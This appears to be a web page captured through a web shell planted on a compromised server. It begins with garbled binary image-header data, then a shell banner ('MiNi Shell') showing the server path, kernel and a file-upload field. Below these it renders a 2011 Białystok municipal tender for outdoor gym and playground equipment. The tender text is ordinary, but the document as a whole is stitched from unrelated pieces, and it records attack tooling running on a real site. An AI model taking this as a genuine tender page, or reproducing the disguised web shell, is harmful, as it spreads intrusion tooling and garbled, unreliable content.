JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110607/159027-N-2011.html

<p class="kh_header"><b>Białystok: Dostawa i montaż  urządzeń zabawowych stanowiących wyposażenie placów zabaw na terenach będących w  Zarządzie Mienia Komunalnego w Białymstoku.</b><br>
<b>Numer ogłoszenia: 159027 - 2011; data zamieszczenia: 07.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż  urządzeń zabawowych stanowiących wyposażenie placów zabaw na terenach będących w  Zarządzie Mienia Komunalnego w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż  urządzeń zabawowych stanowiących wyposażenie placów zabaw na terenach będących w  Zarządzie Mienia Komunalnego w Białymstoku.
Zadanie I -  dostawa i montaż urządzeń siłowni zewnętrznej na części działki gminnej          nr 942/4 obr. 6 przy ul. Klepackiej 4. 
Urządzenia siłowni zewnętrznej:
1. Krzesełka do wyciskania ręcznego - urządzenie dwustanowiskowe ze słupkiem oddzielającym,    o wymiarach 165cmx75cmx200cm, składające się z krzesełka i wyciągu górnego,  do wyciskania ciężaru na siedząco, kształtujące mięśnie pleców i klatki piersiowej oraz poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
2. Krzesełka do ściągania - urządzenie dwustanowiskowe ze słupkiem oddzielającym                     o wymiarach ok. 230cmx75cmx175cm, składające się z krzesełka    i wyciągu górnego do ściągania ciężaru, służące do wzmocnienia mięśni obręczy barkowej, grzbietu i ramion, poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
3. Orbitrek eliptyczny - urządzenie jednostanowiskowe o wymiarach  110cmx50cmx145cm, imitujące bieg, kształtujące mięśnie nóg i ramion,   wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami) oraz normami branżowymi, w szczególności PN-EN 1176 i PN-EN 957 . Wszystkie urządzenia muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie. Dopuszcza się tolerancję w wymiarach urządzeń +/- 20cm. Przy montażu urządzeń muszą być uwzględnione strefy bezpieczeństwa. Urządzenia powinny być zamocowane na trwałe z podłożem, na fundamencie betonowym.   

            Zadanie II - dostawa i montaż urządzeń siłowni zewnętrznej na części działki gminnej     
            nr 1334/6 obr. 20 przy ul. Dojnowskiej.
Urządzenia siłowni zewnętrznej: 
1.  Krzesełka do wyciskania ręcznego - urządzenie dwustanowiskowe ze słupkiem oddzielającym , o wymiarach ok. 165cmx75cmx200cm, składające się z krzesełka i wyciągu górnego, do wyciskania ciężaru na siedząco, kształtujące mięśnie pleców i klatki piersiowej oraz poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1

2. Dwuosobowy trenażer nóg - urządzenie dwustanowiskowe o wymiarach                                      ok. 175cmx45cmx145cm, ze słupkiem oddzielającym, składający się z krzesełka     i prasy nożnej, służący do wyciskania ciężaru nogami, wzmacniający muskulaturę nóg i mięśnie brzucha, wykonany z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1

3. Dwuosobowy orbitrek - urządzenie dwustanowiskowe, o wymiarach  ok.  150cmx125cmx145cm, imitujące bieg, kształtujące mięśnie nóg i ramion,  wykonane z grubych, galwanizowanych rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
       
Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami) oraz normami branżowymi, w szczególności PN-EN 1176 i PN-EN 957 . Wszystkie urządzenia muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie. Dopuszcza się tolerancję w wymiarach urządzeń +/- 20cm. Przy montażu urządzeń muszą być uwzględnione strefy bezpieczeństwa. Urządzenia powinny być zamocowane na trwałe z podłożem, na fundamencie betonowym.   

Zadanie III -  dostawa i montaż urządzeń zabawowych oraz nawierzchni placu zabaw wraz z podbudową na części działki nr 942/4 obr. 6 i części działki nr 938 obr. 6  przy                    ul. Klepackiej 6.
Urządzenia zabawowe i nawierzchnia placu zabaw:
	1. Zestaw wieloelementowy - urządzenie o wymiarach  ok. 800cmx450cmx280cm, składające się z 3 zjeżdżalni, słupów, wspinaczy, podestów, drabinek i kratek; stelaż konstrukcji wykonany z galwanizowanych rur stalowych o różnej grubości, ocynkowanych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne oraz aluminium, rury zabezpieczone antykorozyjnie, elementy plastikowe wykonane z tworzywa sztucznego  - szt. 1;

2. Ścianka wspinaczkowa - urządzenie o wymiarach ok. 350cmx220cm, stelaż konstrukcji wykonany z grubych, galwanizowanych rur stalowych, ocynkowanych, pokrytych farba proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne, rury zabezpieczone antykorozyjnie, na stelażu mocowane trzy panele z tworzywa sztucznego, z chwytami mocowanymi na całej szerokości paneli - sz. 1. 
3.  Urządzenia uzupełniające - ławki drewniane - bez oparcia, o wymiarach 160x40x40cm     na nogach stalowych,  siedzisko wykonane z drewna; odpowiednio zabezpieczone przed działaniem warunków atmosferycznych i przed korozją; zamontowane na trwałe z podłożem - szt.4

4. Podłoże z mat amortyzujących upadek, wykonanych z granulatu gumowego; maty dwuwarstwowe o dużej gęstości, od spodu specjalny czarny materiał pochłaniający energię przy upadku, wierzch w kolorze ciemnej zieleni, odporny na ścieranie i działanie czynników atmosferycznych, wymiary i grubość mat powinny zapewniać bezpieczeństwo upadku                  z wysokości 3,0m.

Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r.          o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami)    oraz normami branżowymi,  w szczególności PN-EN 1176 i PN-EN 1177. Wszystkie urządzenia oraz maty na nawierzchnię placu zabaw muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie oraz posiadać dopuszczenie do stosowania w kontakcie z dziećmi. Dopuszcza się tolerancję w wymiarach zestawu wieloelementowego i ścianki wspinaczkowej +/- 20cm. Montaż urządzeń na placu zabaw ma być wykonany zgodnie ze sztuką budowlaną i normami PN-EN 1176-1:2009, PN-EN 1176-7:2009, tak aby zapewnić bezpieczeństwo użytkowników. Przy montażu urządzeń zabawowych muszą być uwzględnione strefy bezpieczeństwa.
1.Wymaga się udzielenia 24 miesięcy gwarancji i rękojmi na wszystkie trzy zadania. Okres gwarancji liczony jest od dnia podpisania końcowego protokołu odbioru.
2.Cena oferty powinna zwierać wszystkie koszty i składniki  związane z wykonaniem przedmiotu zamówienia.
3. Zamawiający zastrzega, że przedstawione w załączniku 1 szkice urządzeń mają charakter poglądowy i obrazują elementy siłowni zewnętrznej i placu zabaw, jakie się spodziewa uzyskać zamawiający.
4.    Dostarczone przez Wykonawcę urządzenia wyposażenia placów winny być zabezpieczone przed   
      korozją i wpływami atmosferycznymi na okres nie mniejszy niż udzielona gwarancja, posiadać 
      wysoką jakość , trwałość estetykę, zapewniać bezpieczeństwo korzystających z tych urządzeń.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.91-3, 37.53.52.40-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKU
- Wykonawca musi wykazać, iż wykonał (zrealizował i zakończył) z należytą starannością               w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwa zadania polegające na wyposażeniu placu zabaw / siłowni zewnętrznej,  o wartości brutto co najmniej 15 tys. PLN każde;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale VI SIWZ pkt 3 ppkt 2, 
2)	dokument określony w rozdziale VI SIWZ pkt 2 ppkt 1 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 oraz oświadczenie o niepodleganiu wykluczeniu określone w rozdziale VI SIWZ pkt 3 ppkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
7.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
1)	wypełniony formularz ofertowy - wg załączonego wzoru załącznik nr 2 do SIWZ,
2)	wypełniony szczegółowy formularz cenowy - wg załączonego wzoru załącznik nr 3 do SIWZ,
3)	pełnomocnictwo w oryginale albo notarialnie potwierdzonej kopii - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego 15-370 Białystok , ul. gen. j. Bema 89/1 -pok.111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 09:00, miejsce: Zarząd Mienia Komunalnego 15-370 Białystok , ul. gen. j. Bema 89/1 -pok.201- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż urządzeń siłowni zewnętrznej na części działki gminnej   nr 942/4 obr. 6 przy ul. Klepackiej 4  w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenia siłowni zewnętrznej:
1. Krzesełka do wyciskania ręcznego - urządzenie dwustanowiskowe ze słupkiem oddzielającym,    o wymiarach 165cmx75cmx200cm, składające się z krzesełka i wyciągu górnego,  do wyciskania ciężaru na siedząco, kształtujące mięśnie pleców i klatki piersiowej oraz poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
2. Krzesełka do ściągania - urządzenie dwustanowiskowe ze słupkiem oddzielającym                     o wymiarach ok. 230cmx75cmx175cm, składające się z krzesełka    i wyciągu górnego do ściągania ciężaru, służące do wzmocnienia mięśni obręczy barkowej, grzbietu i ramion, poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
3. Orbitrek eliptyczny - urządzenie jednostanowiskowe o wymiarach  110cmx50cmx145cm, imitujące bieg, kształtujące mięśnie nóg i ramion,   wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami) oraz normami branżowymi, w szczególności PN-EN 1176 i PN-EN 957 . Wszystkie urządzenia muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie. Dopuszcza się tolerancję w wymiarach urządzeń +/- 20cm. Przy montażu urządzeń muszą być uwzględnione strefy bezpieczeństwa. Urządzenia powinny być zamocowane na trwałe z podłożem, na fundamencie betonowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.91-3, 37.53.52.40-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż urządzeń siłowni zewnętrznej na części działki gminnej      nr 1334/6 obr. 20 przy ul. Dojnowskiej  w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenia siłowni zewnętrznej: 
1.  Krzesełka do wyciskania ręcznego - urządzenie dwustanowiskowe ze słupkiem oddzielającym , o wymiarach ok. 165cmx75cmx200cm, składające się z krzesełka i wyciągu górnego, do wyciskania ciężaru na siedząco, kształtujące mięśnie pleców i klatki piersiowej oraz poprawiające ogólną kondycję fizyczną, wykonane z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1

2. Dwuosobowy trenażer nóg - urządzenie dwustanowiskowe o wymiarach                                      ok. 175cmx45cmx145cm, ze słupkiem oddzielającym, składający się z krzesełka     i prasy nożnej, służący do wyciskania ciężaru nogami, wzmacniający muskulaturę nóg i mięśnie brzucha, wykonany z grubych, galwanizowanych  rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1

3. Dwuosobowy orbitrek - urządzenie dwustanowiskowe, o wymiarach  ok.  150cmx125cmx145cm, imitujące bieg, kształtujące mięśnie nóg i ramion,  wykonane z grubych, galwanizowanych rur stalowych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne; rury zabezpieczone antykorozyjnie - szt. 1
       
Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami) oraz normami branżowymi, w szczególności PN-EN 1176 i PN-EN 957 . Wszystkie urządzenia muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie. Dopuszcza się tolerancję w wymiarach urządzeń +/- 20cm. Przy montażu urządzeń muszą być uwzględnione strefy bezpieczeństwa. Urządzenia powinny być zamocowane na trwałe z podłożem, na fundamencie betonowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.91-3, 37.53.52.40-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż urządzeń zabawowych oraz nawierzchni placu zabaw wraz z podbudową na części działki nr 942/4 obr. 6 i części działki nr 938 obr. 6  przy  ul. Klepackiej 6  w  Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenia zabawowe i nawierzchnia placu zabaw:
	1. Zestaw wieloelementowy - urządzenie o wymiarach  ok. 800cmx450cmx280cm, składające się z 3 zjeżdżalni, słupów, wspinaczy, podestów, drabinek i kratek; stelaż konstrukcji wykonany z galwanizowanych rur stalowych o różnej grubości, ocynkowanych, pokrytych farbą proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne oraz aluminium, rury zabezpieczone antykorozyjnie, elementy plastikowe wykonane z tworzywa sztucznego  - szt. 1;

2. Ścianka wspinaczkowa - urządzenie o wymiarach ok. 350cmx220cm, stelaż konstrukcji wykonany z grubych, galwanizowanych rur stalowych, ocynkowanych, pokrytych farba proszkową odporną na warunki atmosferyczne i uszkodzenia mechaniczne, rury zabezpieczone antykorozyjnie, na stelażu mocowane trzy panele z tworzywa sztucznego, z chwytami mocowanymi na całej szerokości paneli - sz. 1. 
3.  Urządzenia uzupełniające - ławki drewniane - bez oparcia, o wymiarach 160x40x40cm     na nogach stalowych,  siedzisko wykonane z drewna; odpowiednio zabezpieczone przed działaniem warunków atmosferycznych i przed korozją; zamontowane na trwałe z podłożem - szt.4

4. Podłoże z mat amortyzujących upadek, wykonanych z granulatu gumowego; maty dwuwarstwowe o dużej gęstości, od spodu specjalny czarny materiał pochłaniający energię przy upadku, wierzch w kolorze ciemnej zieleni, odporny na ścieranie i działanie czynników atmosferycznych, wymiary i grubość mat powinny zapewniać bezpieczeństwo upadku                  z wysokości 3,0m.

